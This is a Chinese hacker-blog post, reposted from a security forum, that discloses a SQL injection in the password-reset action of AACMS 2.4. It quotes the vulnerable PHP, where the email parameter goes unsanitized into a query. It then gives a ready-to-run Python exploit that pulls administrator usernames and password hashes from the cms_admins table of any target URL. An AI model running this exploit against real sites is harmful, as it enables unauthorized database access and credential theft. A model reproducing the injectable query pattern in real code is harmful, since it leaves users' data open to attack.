AACMS 2.4 注入漏洞

  • A+
所属分类:lcx

    By:Cond0r

    第一次挖漏洞,找了个小点得,大牛勿喷

user.action.php 文本第98行:

elseif ($act=='repassword') {       
       
        $uid = $db->getOne("SELECT uid FROM $_SC[tablepre]members WHERE email='$_REQUEST[email]'"); //明显的。。。
       
        if($uid){
                echo $uid;
                $password = random(6);
               
                $smtpemailto = $_REQUEST['email'];
                $mailsubject = '找出密码 - AACMS';
                $mailbody = '您的密码为:' . $password .'
本邮件为系统自动所发,请勿回复!';
                include(S_ROOT . 'include/send_mail.php');
               
                $db->update("$_SC[tablepre]members",array( 'password' => md5($password) ),'uid='.$uid);
               
                echo '邮箱发送成功,请查收!';
               

        }else{
                echo '邮箱未被使用!';
        }
}

    py写的exp..需要

以下是引用片段:

#/usr/bin/python
import sqlerror
from sys import argv
sql=sqlerror.errorinj()
try:
    site=argv[1]
   
    url=site+"/user.action.php?act=repassword&email="
    database=sql.getdatabase(url)
    table=["username","password"]
    for t in table:
        sql.strgetdata(url,"cms_admins",t,database)
       
except:
    print "Usage: "+argv[0]+" http://127.0.0.1/"
    print "Usage: "+argv[0]+" http://127.0.0.1/aacms"
'''
url=site+"/user.action.php?act=repassword&email="
print url
database=sql.strgetdatabase(url)
table=["username","password"]
for t in table:
    sql.strgetdata(url,"cms_admins",t,database)  
'''

    http://t00ls.net/thread-18866-1-1.html

文章来源于lcx.cc:AACMS 2.4 注入漏洞

相关推荐: 在T00ls论坛又看到富二、三代有感

富二代,富三代,是最近人们热议的话题,我写这些并不是为了批评富人或宣扬仇富心理,只是提倡花自己赚来的钱。 也许我的文笔有些生硬无趣、逻辑混乱,因为我不是什么文学大师,我只是一个普通人,大家就将就着看吧。不喜欢看或者对本文反感,可以随时闪人,没有人规定你必须看的…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: